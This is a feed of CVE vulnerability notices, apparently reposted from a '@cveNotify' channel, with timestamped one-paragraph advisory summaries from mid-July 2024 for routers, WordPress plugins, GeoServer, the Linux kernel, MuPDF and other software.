🚨 CVE-2023-5147** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been classified as critical. This affects an unknown part of the file /sysmanage/updateos.php. The manipulation of the argument 1_file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240243. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-07-16 21:37:31 |
🚨 CVE-2024-40536Shenzhen Libituo Technology Co., Ltd LBT-T300-T400 v3.2 were discovered to contain a stack overflow via the pin_3g_code parameter in the config_3g_para function.🎖@cveNotify |
|
| 2024-07-16 21:37:30 |
🚨 CVE-2024-40535Shenzhen Libituo Technology Co., Ltd LBT-T300-T400 v3.2 was discovered to contain a stack overflow via the apn_name_3g parameter in the config_3g_para function.🎖@cveNotify |
|
| 2024-07-16 21:37:26 |
🚨 CVE-2024-38458Xenforo before 2.2.16 allows code injection.🎖@cveNotify |
|
| 2024-07-16 21:37:25 |
🚨 CVE-2022-38625Patlite NH-FB v1.46 and below was discovered to contain insufficient firmware validation during the upgrade firmware file upload process. This vulnerability allows authenticated attackers to create and upload their own custom-built firmware and inject malicious code. NOTE: the vendor's position is that this is a design choice, not a vulnerability🎖@cveNotify |
|
| 2024-07-16 21:37:24 |
🚨 CVE-2022-34965OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain an arbitrary file upload vulnerability via the component /ossn/administrator/com_installer. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. Note: The project owner believes this is intended behavior of the application as it only allows authenticated admins to upload files.🎖@cveNotify |
|
| 2024-07-16 20:37:32 |
🚨 CVE-2024-40515An issue in SHENZHEN TENDA TECHNOLOGY CO.,LTD Tenda AX2pro V16.03.29.48_cn allows a remote attacker to execute arbitrary code via the Routing functionality.🎖@cveNotify |
|
| 2024-07-16 20:37:25 |
🚨 CVE-2024-40455An arbitrary file deletion vulnerability in ThinkSAAS v3.7 allows attackers to delete arbitrary files via a crafted request.🎖@cveNotify |
|
| 2024-07-16 20:37:24 |
🚨 CVE-2022-40705An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-07-16 19:37:31 |
🚨 CVE-2024-40516An issue in H3C Technologies Co., Limited H3C Magic RC3000 RC3000V100R009 allows a remote attacker to execute arbitrary code via the Routing functionality.🎖@cveNotify |
|
| 2024-07-16 19:37:30 |
🚨 CVE-2024-40503An issue in Tenda AX12 v.16.03.49.18_cn+ allows a remote attacker to cause a denial of service via the Routing functionality and ICMP packet handling.🎖@cveNotify |
|
| 2024-07-16 19:37:29 |
🚨 CVE-2024-40394Simple Library Management System Project Using PHP/MySQL v1.0 was discovered to contain an arbitrary file upload vulnerability via the component ajax.php.🎖@cveNotify |
|
| 2024-07-16 19:37:26 |
🚨 CVE-2024-40393Online Clinic Management System In PHP With Free Source code v1.0 was discovered to contain a SQL injection vulnerability via the user parameter at login.php.🎖@cveNotify |
|
| 2024-07-16 19:37:25 |
🚨 CVE-2024-40129Open5GS v2.6.4 is vulnerable to Buffer Overflow. via /lib/pfcp/context.c.🎖@cveNotify |
|
| 2024-07-16 19:37:24 |
🚨 CVE-2024-39036SeaCMS v12.9 is vulnerable to Arbitrary File Read via admin_safe.php.🎖@cveNotify |
|
| 2024-07-16 18:37:25 |
🚨 CVE-2024-5154A flaw was found in cri-o. A malicious container can create a symbolic link to arbitrary files on the host via directory traversal (“../“). This flaw allows the container to read and write to arbitrary files on the host system.🎖@cveNotify |
|
| 2024-07-16 18:37:24 |
🚨 CVE-2021-3773A flaw in netfilter could allow a network-connected attacker to infer openvpn connection endpoint information for further use in traditional network attacks.🎖@cveNotify |
|
| 2024-07-16 18:07:38 |
🚨 CVE-2010-4344Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.🎖@cveNotify |
|
| 2024-07-16 18:07:31 |
🚨 CVE-2010-3035Cisco IOS XR 3.4.0 through 3.9.1, when BGP is enabled, does not properly handle unrecognized transitive attributes, which allows remote attackers to cause a denial of service (peering reset) via a crafted prefix announcement, as demonstrated in the wild in August 2010 with attribute type code 99, aka Bug ID CSCti62211.🎖@cveNotify |
|
| 2024-07-16 18:07:30 |
🚨 CVE-2009-1123The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability."🎖@cveNotify |
|
| 2024-07-16 18:07:26 |
🚨 CVE-2008-2992Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.🎖@cveNotify |
|
| 2024-07-16 18:07:25 |
🚨 CVE-2002-0367smss.exe debugging subsystem in Windows NT and Windows 2000 does not properly authenticate programs that connect to other programs, which allows local users to gain administrator or SYSTEM privileges by duplicating a handle to a privileged process, as demonstrated by DebPloit.🎖@cveNotify |
|
| 2024-07-16 17:37:43 |
🚨 CVE-2017-6740The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities. The vulnerabilities are due to a buffer overflow condition in the SNMP subsystem of the affected software. The vulnerabilities affect all versions of SNMP: Versions 1, 2c, and 3. To exploit these vulnerabilities via SNMP Version 2c or earlier, the attacker must know the SNMP read-only community string for the affected system. To exploit these vulnerabilities via SNMP Version 3, the attacker must have user credentials for the affected system. All devices that have enabled SNMP and have not explicitly excluded the affected MIBs or OIDs should be considered vulnerable. Cisco Bug IDs: CSCve66601.🎖@cveNotify |
|
| 2024-07-16 17:37:42 |
🚨 CVE-2016-7262Microsoft Excel 2007 SP3, Excel 2010 SP2, Excel 2013 SP1, Excel 2013 RT SP1, Excel 2016, Office Compatibility Pack SP3, and Excel Viewer allow user-assisted remote attackers to execute arbitrary commands via a crafted cell that is mishandled upon a click, aka "Microsoft Office Security Feature Bypass Vulnerability."🎖@cveNotify |
|
| 2024-07-16 17:37:41 |
🚨 CVE-2015-7645Adobe Flash Player 18.x through 18.0.0.252 and 19.x through 19.0.0.207 on Windows and OS X and 11.x through 11.2.202.535 on Linux allows remote attackers to execute arbitrary code via a crafted SWF file, as exploited in the wild in October 2015.🎖@cveNotify |
|
| 2024-07-16 17:37:37 |
🚨 CVE-2015-2387ATMFD.DLL in the Adobe Type Manager Font Driver in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, aka "ATMFD.DLL Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2024-07-16 17:37:36 |
🚨 CVE-2015-1701Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka "Win32k Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-16 17:07:25 |
🚨 CVE-2024-37978Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 17:07:24 |
🚨 CVE-2024-37977Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 16:37:42 |
🚨 CVE-2024-40322An issue was discovered in JFinalCMS v.5.0.0. There is a SQL injection vulnerablity via /admin/div_data/data🎖@cveNotify |
|
| 2024-07-16 16:37:41 |
🚨 CVE-2024-33180Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo.🎖@cveNotify |
|
| 2024-07-16 16:37:40 |
🚨 CVE-2024-22442The vulnerability could be remotely exploited to bypass authentication.🎖@cveNotify |
|
| 2024-07-16 16:37:37 |
🚨 CVE-2024-37974Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 16:37:36 |
🚨 CVE-2024-37971Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 16:37:35 |
🚨 CVE-2024-37970Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 16:37:32 |
🚨 CVE-2024-37969Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 16:37:31 |
🚨 CVE-2024-36500Privilege escalation vulnerability in the AMS moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-07-16 16:37:30 |
🚨 CVE-2024-31956An issue was discovered in Samsung Mobile Processor Exynos 2200, Exynos 1480, Exynos 2400. It lacks proper buffer length checking, which can result in an Out-of-Bounds Write.🎖@cveNotify |
|
| 2024-07-16 16:37:26 |
🚨 CVE-2024-30219Active debug code vulnerability exists in MZK-MF300N all firmware versions. If a logged-in user who knows how to use the debug function accesses the device's management page, an unintended operation may be performed.🎖@cveNotify |
|
| 2024-07-16 15:37:38 |
🚨 CVE-2024-6655A flaw was found in the GTK library. Under certain conditions, it is possible for a library to be injected into a GTK application from the current working directory.🎖@cveNotify |
|
| 2024-07-16 15:37:37 |
🚨 CVE-2022-45449Sensitive information disclosure due to excessive privileges assigned to Acronis Agent. The following products are affected: Acronis Cyber Protect 15 (Windows, Linux) before build 30984.🎖@cveNotify |
|
| 2024-07-16 15:37:33 |
🚨 CVE-2024-6716A flaw was found in libtiff. This flaw allows an attacker to create a crafted tiff file, forcing libtiff to allocate memory indefinitely. This issue can result in a denial of service of the system consuming libtiff due to memory starvation.🎖@cveNotify |
|
| 2024-07-16 15:37:32 |
🚨 CVE-2024-37975Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-16 15:37:31 |
🚨 CVE-2016-20022In the Linux kernel before 4.8, usb_parse_endpoint in drivers/usb/core/config.c does not validate the wMaxPacketSize field of an endpoint descriptor. NOTE: This vulnerability only affects products that are no longer supported by the supplier.🎖@cveNotify |
|
| 2024-07-16 15:37:30 |
🚨 CVE-2024-5465Function vulnerabilities in the Calendar moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-07-16 15:37:26 |
🚨 CVE-2024-36503Memory management vulnerability in the Gralloc moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-07-16 15:37:25 |
🚨 CVE-2022-45544Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role.🎖@cveNotify |
|
| 2024-07-16 15:37:24 |
🚨 CVE-2023-23126Connectwise Automate 2022.11 is vulnerable to Clickjacking. The login screen can be iframed and used to manipulate users to perform unintended actions. NOTE: the vendor's position is that a Content-Security-Policy HTTP response header is present to block this attack.🎖@cveNotify |
|
| 2024-07-16 15:07:30 |
🚨 CVE-2024-32913In wl_notify_rx_mgmt_frame of wl_cfg80211.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-16 15:07:27 |
🚨 CVE-2024-32912there is a possible persistent Denial of Service due to test/debugging code left in a production build. This could lead to local denial of service of impaired use of the device with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-16 15:07:26 |
🚨 CVE-2024-32910In handle_msg_shm_map_req of trusty/user/base/lib/spi/srv/tipc/tipc.c, there is a possible stack data disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-16 15:07:25 |
🚨 CVE-2024-32902Remote prevention of access to cellular service with no user interaction (for example, crashing the cellular radio service with a malformed packet)🎖@cveNotify |
|
| 2024-07-16 15:07:24 |
🚨 CVE-2024-32504An issue was discovered in Samsung Mobile Processor and Wearable Processor Exynos 850, Exynos 1080, Exynos 2100, Exynos 1280, Exynos 1380, Exynos 1330, Exynos W920, Exynos W930. The mobile processor lacks proper length checking, which can result in an OOB (Out-of-Bounds) Write vulnerability.🎖@cveNotify |
|
| 2024-07-16 14:37:26 |
🚨 CVE-2023-37539The Domino Catalog template is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability. An attacker with the ability to edit documents in the catalog application/database created from this template can embed a cross site scripting attack. The attack would be activated by an end user clicking it.🎖@cveNotify |
|
| 2024-07-16 14:37:25 |
🚨 CVE-2024-36774An arbitrary file upload vulnerability in Monstra CMS v3.0.4 allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2024-07-16 14:37:24 |
🚨 CVE-2023-24229DrayTek Vigor2960 v1.5.1.4 allows an authenticated attacker with network access to the web management interface to inject operating system commands via the mainfunction.cgi 'parameter' parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-16 14:07:44 |
🚨 CVE-2024-6689Local Privilege Escalation in MSI-Installer in baramundi Management Agent v23.1.172.0 on Windows allows a local unprivileged user to escalate privileges to SYSTEM.🎖@cveNotify |
|
| 2024-07-16 14:07:43 |
🚨 CVE-2024-38493A reflected cross-site scripting (XSS) vulnerability exists in the PAM UI web interface. A remote attacker able to convince a PAM user to click on a specially crafted link to the PAM UI web interface could potentially execute arbitrary client-side code in the context of PAM UI.🎖@cveNotify |
|
| 2024-07-16 14:07:42 |
🚨 CVE-2024-38491The vulnerability allows an unauthenticated attacker to read arbitrary information from the database.🎖@cveNotify |
|
| 2024-07-16 14:07:38 |
🚨 CVE-2024-36457The vulnerability allows an attacker to bypass the authentication requirements for a specific PAM endpoint.🎖@cveNotify |
|
| 2024-07-16 14:07:37 |
🚨 CVE-2024-36455An improper input validation allows an unauthenticated attacker to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request.🎖@cveNotify |
|
| 2024-07-16 14:07:36 |
🚨 CVE-2024-6738The tumbnail API of Tronclass from WisdomGarden lacks proper access control, allowing unauthenticated remote attackers to obtain certain specific files by modifying the URL.🎖@cveNotify |
|
| 2024-07-16 14:07:33 |
🚨 CVE-2024-6737The access control in the Electronic Official Document Management System from 2100 TECHNOLOGY is not properly implemented, allowing remote attackers with regular privileges to access the account settings functionality and create an administrator account.🎖@cveNotify |
|
| 2024-07-16 14:07:32 |
🚨 CVE-2024-39740IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 displays version information in HTTP requests that could allow an attacker to gather information for future attacks against the system. IBM X-Force ID: 296009.🎖@cveNotify |
|
| 2024-07-16 14:07:31 |
🚨 CVE-2024-39729IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 could allow an authenticated user to obtain sensitive information from source code that could be used in further attacks against the system. IBM X-Force ID: 295968.🎖@cveNotify |
|
| 2024-07-16 14:07:27 |
🚨 CVE-2024-39739IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 296008.🎖@cveNotify |
|
| 2024-07-16 14:07:26 |
🚨 CVE-2024-39731IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 295970.🎖@cveNotify |
|
| 2024-07-16 14:07:25 |
🚨 CVE-2024-39728IBM Datacap Navigator 9.1.5, 9.1.6, 9.1.7, 9.1.8, and 9.1.9 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 295967.🎖@cveNotify |
|
| 2024-07-16 12:37:25 |
🚨 CVE-2021-47622In the Linux kernel, the following vulnerability has been resolved:scsi: ufs: Fix a deadlock in the error handlerThe following deadlock has been observed on a test setup: - All tags allocated - The SCSI error handler calls ufshcd_eh_host_reset_handler() - ufshcd_eh_host_reset_handler() queues work that calls ufshcd_err_handler() - ufshcd_err_handler() locks up as follows:Workqueue: ufs_eh_wq_0 ufshcd_err_handler.cfi_jtCall trace: __switch_to+0x298/0x5d8 __schedule+0x6cc/0xa94 schedule+0x12c/0x298 blk_mq_get_tag+0x210/0x480 __blk_mq_alloc_request+0x1c8/0x284 blk_get_request+0x74/0x134 ufshcd_exec_dev_cmd+0x68/0x640 ufshcd_verify_dev_init+0x68/0x35c ufshcd_probe_hba+0x12c/0x1cb8 ufshcd_host_reset_and_restore+0x88/0x254 ufshcd_reset_and_restore+0xd0/0x354 ufshcd_err_handler+0x408/0xc58 process_one_work+0x24c/0x66c worker_thread+0x3e8/0xa4c kthread+0x150/0x1b4 ret_from_fork+0x10/0x30Fix this lockup by making ufshcd_exec_dev_cmd() allocate a reservedrequest.🎖@cveNotify |
|
| 2024-07-16 11:37:25 |
🚨 CVE-2024-6621The RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wprss_activate_feed_source' and 'wprss_pause_feed_source' functions in all versions up to, and including, 4.23.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or pause existing RSS feeds.🎖@cveNotify |
|
| 2024-07-16 11:37:24 |
🚨 CVE-2024-6457The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the ‘woof_author’ parameter in all versions up to, and including, 1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-16 09:37:31 |
🚨 CVE-2024-6570The Glossary plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.26. This is due the plugin utilizing wpdesk and not preventing direct access to the test files along with display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-16 09:37:30 |
🚨 CVE-2024-6565The AForms — Form Builder for Price Calculator & Cost Estimation plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.6. This is due to the plugin utilizing the aura library and allowing direct access to the phpunit test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-16 09:37:26 |
🚨 CVE-2024-3779Denial of service vulnerability present shortly after product installation or upgrade, potentially allowed an attacker to render ESET’s security product inoperable, provided non-default preconditions were met.🎖@cveNotify |
|
| 2024-07-16 09:37:25 |
🚨 CVE-2024-2691The WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events' shortcode in all versions up to, and including, 3.1.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-16 09:37:24 |
🚨 CVE-2024-1937The Brizy – Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_item' function in all versions up to, and including, 2.4.44. This makes it possible for authenticated attackers, with contributor access and above, to modify the content of arbitrary published posts, which includes the ability to insert malicious JavaScript.🎖@cveNotify |
|
| 2024-07-16 08:37:25 |
🚨 CVE-2024-41008In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: change vm->task_info handlingThis patch changes the handling and lifecycle of vm->task_info object.The major changes are:- vm->task_info is a dynamically allocated ptr now, and its uasge is reference counted.- introducing two new helper funcs for task_info lifecycle management - amdgpu_vm_get_task_info: reference counts up task_info before returning this info - amdgpu_vm_put_task_info: reference counts down task_info- last put to task_info() frees task_info from the vm.This patch also does logistical changes required for existing usageof vm->task_info.V2: Do not block all the prints when task_info not found (Felix)V3: Fixed review comments from Felix - Fix wrong indentation - No debug message for -ENOMEM - Add NULL check for task_info - Do not duplicate the debug messages (ti vs no ti) - Get first reference of task_info in vm_init(), put last in vm_fini()V4: Fixed review comments from Felix - fix double reference increment in create_task_info - change amdgpu_vm_get_task_info_pasid - additional changes in amdgpu_gem.c while porting🎖@cveNotify |
|
| 2024-07-16 08:37:24 |
🚨 CVE-2023-52290In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn't validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, so this is a low-impact vulnerability.Mitigation:all users should upgrade to 2.1.4, Such parameters will be blocked.🎖@cveNotify |
|
| 2024-07-16 07:37:25 |
🚨 CVE-2024-6559The Backup, Restore and Migrate WordPress Sites With the XCloner Plugin plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 4.7.3. This is due the plugin utilizing sabre without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-16 07:37:24 |
🚨 CVE-2024-4780The Image Hover Effects – Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘eihe_link’ parameter in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-16 05:37:24 |
🚨 CVE-2024-6557The SchedulePress – Auto Post & Publish, Auto Social Share, Schedule Posts with Editorial Calendar & Missed Schedule Post Publisher plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 5.1.3. This is due the plugin utilizing the wpdeveloper library and leaving the demo files in place with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-16 02:37:25 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-16 02:37:24 |
🚨 CVE-2023-3495** UNSUPPORTED WHEN ASSIGNED ** Out-of-bounds Write vulnerability in Hitachi EH-VIEW (KeypadDesigner) allows local attackers to potentially execute arbitray code on affected EH-VIEW installations. User interaction is required to exploit the vulnerabilities in that the user must open a malicious file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-16 01:07:25 |
🚨 CVE-2024-36401GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.Versions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.🎖@cveNotify |
|
| 2024-07-16 01:07:24 |
🚨 CVE-2022-24816JAI-EXT is an open-source project which aims to extend the Java Advanced Imaging (JAI) API. Programs allowing Jiffle script to be provided via network request can lead to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project. Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application, by removing janino-x.y.z.jar from the classpath.🎖@cveNotify |
|
| 2024-07-15 23:37:24 |
🚨 CVE-2024-40524Directory Traversal vulnerability in xmind2testcase v.1.5 allows a remote attacker to execute arbitrary code via the webtool\application.py component.🎖@cveNotify |
|
| 2024-07-15 22:37:32 |
🚨 CVE-2024-4143A potential security vulnerability has been identified in certain HP PC products using AMI BIOS, which might allow arbitrary code execution. AMI has released firmware updates to mitigate this vulnerability.🎖@cveNotify |
|
| 2024-07-15 22:37:26 |
🚨 CVE-2024-40632Linkerd is an open source, ultralight, security-first service mesh for Kubernetes. In affected versions when the application being run by linkerd is susceptible to SSRF, an attacker could potentially trigger a denial-of-service (DoS) attack by making requests to localhost:4191/shutdown. Linkerd could introduce an optional environment variable to control a token that must be passed as a header. Linkerd should reject shutdown requests that do not include this header. This issue has been addressed in release version edge-24.6.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-15 22:37:25 |
🚨 CVE-2024-5634Longse model LBH30FE200W cameras, as well as products based on this device, make use of telnet passwords which follow a specific pattern. Once the pattern is known, brute-forcing the password becomes relatively easy. Additionally, every camera with the same firmware version shares the same password.🎖@cveNotify |
|
| 2024-07-15 22:37:24 |
🚨 CVE-2024-37032Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.🎖@cveNotify |
|
| 2024-07-15 21:37:32 |
🚨 CVE-2018-1000040In Artifex MuPDF 1.12.0 and earlier, multiple use of uninitialized value bugs in the PDF parser could allow an attacker to cause a denial of service (crash) or influence program flow via a crafted file.🎖@cveNotify |
|
| 2024-07-15 21:37:26 |
🚨 CVE-2018-1000039In Artifex MuPDF 1.12.0 and earlier, multiple heap use after free bugs in the PDF parser could allow an attacker to execute arbitrary code, read memory, or cause a denial of service via a crafted file.🎖@cveNotify |
|
| 2024-07-15 21:37:25 |
🚨 CVE-2018-1000036In Artifex MuPDF 1.12.0 and earlier, multiple memory leaks in the PDF parser allow an attacker to cause a denial of service (memory leak) via a crafted file.🎖@cveNotify |
|
| 2024-07-15 21:37:24 |
🚨 CVE-2017-7264Use-after-free vulnerability in the fz_subsample_pixmap function in fitz/pixmap.c in Artifex MuPDF 1.10a allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted document.🎖@cveNotify |
|
| 2024-07-15 20:37:32 |
🚨 CVE-2024-39915Thruk is a multibackend monitoring webinterface for Naemon, Nagios, Icinga and Shinken using the Livestatus API. This authenticated RCE in Thruk allows authorized users with network access to inject arbitrary commands via the URL parameter during PDF report generation. The Thruk web application does not properly process the url parameter when generating a PDF report. An authorized attacker with access to the reporting functionality could inject arbitrary commands that would be executed when the script /script/html2pdf.sh is called. The vulnerability can be exploited by an authorized user with network access. This issue has been addressed in version 3.16. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-15 20:37:26 |
🚨 CVE-2024-39912web-auth/webauthn-lib is an open source set of PHP libraries and a Symfony bundle to allow developers to integrate that authentication mechanism into their web applications. The ProfileBasedRequestOptionsBuilder method returns allowedCredentials without any credentials if no username was found. When WebAuthn is used as the first or only authentication method, an attacker can enumerate usernames based on the absence of the `allowedCredentials` property in the assertion options response. This allows enumeration of valid or invalid usernames. By knowing which usernames are valid, attackers can focus their efforts on a smaller set of potential targets, increasing the efficiency and likelihood of successful attacks. This issue has been addressed in version 4.9.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-15 20:37:25 |
🚨 CVE-2023-51103A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in the function fz_new_pixmap_from_float_data() of pixmap.c.🎖@cveNotify |
|
| 2024-07-15 20:37:24 |
